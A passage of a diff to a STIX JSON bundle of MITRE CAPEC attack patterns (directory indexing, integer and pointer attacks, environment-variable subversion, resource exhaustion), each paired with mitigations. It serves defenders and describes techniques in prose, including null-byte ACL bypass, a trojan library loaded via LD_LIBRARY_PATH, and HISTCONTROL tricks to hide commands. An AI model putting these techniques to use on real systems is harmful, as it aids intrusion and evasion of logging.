}, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-11", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Directory-Indexing" + } + ], + "id": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Directory Indexing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80\n The target application does not have direct hyperlink to the \"backup\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a \"db_dump.php\" file in it. This sensitive data should not be disclosed publicly.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Directory Discovery: Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.

    2. Techniques
    Send requests to the web server for common directory names
    If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.
    Search for uncommon or potentially user created directories that may be present.

Experiment

  1. Iteratively explore directory/file structures: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

    2. Techniques
    Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.
    Use a browser to manually explore the website by issuing a request ending the URL in a slash '/'.
    Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
    Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a \"/\" request

Exploit

  1. Read directories or files which are not intended for public viewing.: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

    2. Techniques
    Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a \"/\" request
    Try other known exploits to elevate privileges sufficient to bypass protected directories.
    List the files in the directory by issuing a request with the URL ending in a \"/\" slash.
    Access the files via direct URL and capture contents.
    Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
    Sequentially request a list of common base files to each directory discovered.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name.", + "The adversary must be able to control the path that is requested of the target.", + "The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.", + "The server version or patch level must not inherently prevent known directory listing attacks from working." + ], + "x_capec_resources_required": [ + "Ability to send HTTP requests to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass the access control of the directory of listings", + "Low": "To issue the request to URL without given a specific file name" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.", + "id": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d386aba-01fb-4a86-8b95-a4778cf497ab", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e159a65a-59f4-41fb-82a5-0f5cf069b10f", + "spec_version": "2.1", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "2. Preventing with .htaccess in Apache web server: In .htaccess, write \"Options-indexes\".", + "id": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--665bc535-a6b1-48ea-9fd2-4cda3661f872", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c00c5ac-d08c-4abb-8ce7-7000072c9d15", + "spec_version": "2.1", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "3. Suppressing error messages: using error 403 \"Forbidden\" message exactly like error 404 \"Not Found\" message.", + "id": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-127-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c93af142-fad4-470f-ab94-e6b35f993234", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--778c2c99-3964-42e2-9e8a-33e9adf9201b", + "spec_version": "2.1", + "target_ref": "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.", + "external_references": [ + { + "external_id": "CAPEC-129", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-822", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/822.html" + }, + { + "external_id": "CWE-823", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/823.html" + } + ], + "id": "attack-pattern--6295b7e2-98e9-4fc8-acbf-99769cb3cdf0", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Pointer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must have a pointer variable that the attacker can influence to hold an arbitrary value." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Impair Defenses:Impair Command History Logging", + "external_id": "T1562.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/003" + }, + { + "description": "Hijack Execution Flow:Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack Execution Flow:Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Subverting Environment Variable Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the adversary upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\172.16.2.100\\shared_files\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)", + "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on. Most importantly, the adversary tries to determine what environment variables might be used by the underlying software, or even the application itself.

Experiment

  1. Find user-controlled environment variables: Using the information found by probing the application, the adversary attempts to manipulate any user-controlled environment variables they have found are being used by the application, or suspect are being used by the application, and observe the effects of these changes. If the adversary notices any significant changes to the application, they will know that a certain environment variable is important to the application behavior and indicates a possible attack vector.

    2. Techniques
    Alter known environment variables such as \"$PATH\", \"$HOSTNAME\", or \"LD_LIBRARY_PATH\" and see if application behavior changes.

Exploit

  1. Manipulate user-controlled environment variables: The adversary manipulates the found environment variable(s) to abuse the normal flow of processes or to gain access to privileged resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "An environment variable is accessible to the user.", + "An environment variable used by the application can be tainted with user supplied data.", + "Input data used in an environment variable is not validated properly.", + "The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an adversary may attempt to manipulate that variable." + ], + "x_capec_skills_required": { + "High": "Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.", + "Low": "In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect environment variables against unauthorized read and write access.", + "id": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e351819c-a8ce-4628-bc2d-fe25172f524f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the configuration files which contain environment variables against illegitimate read and write access.", + "id": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f927e9e7-a3c2-4e14-8da4-37711f2f0161", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--88742f57-22ea-48b4-a8a8-aa72de425e08", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b2e048e-f266-4abc-a3e7-0430607e7aeb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege.", + "id": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-13-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36c8f1a2-fc68-4417-ba38-adaa3e68a90d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ea96ff9-d08f-4da5-b893-17f63f09b83e", + "spec_version": "2.1", + "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.", + "external_references": [ + { + "external_id": "CAPEC-130", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-1325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1325.html" + }, + { + "description": "Endpoint Denial of Service:Application Exhaustion Flood", + "external_id": "T1499.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/003" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Excessive Allocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de" + ], + "x_capec_prerequisites": [ + "The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the amount of resources that are accessible to unprivileged users.", + "id": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Consider all potentially relevant properties when validating input.", + "id": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--282aa96a-4a57-42b1-826a-e6e4abbd87db", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--51e066b9-7488-4231-91fa-099bbb87c489", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use resource-limiting settings, if possible.", + "id": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98433369-590b-48b9-a19e-d159dde960e1", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.", + "external_references": [ + { + "external_id": "CAPEC-131", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Resource Leak Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)", + "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.\n In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until 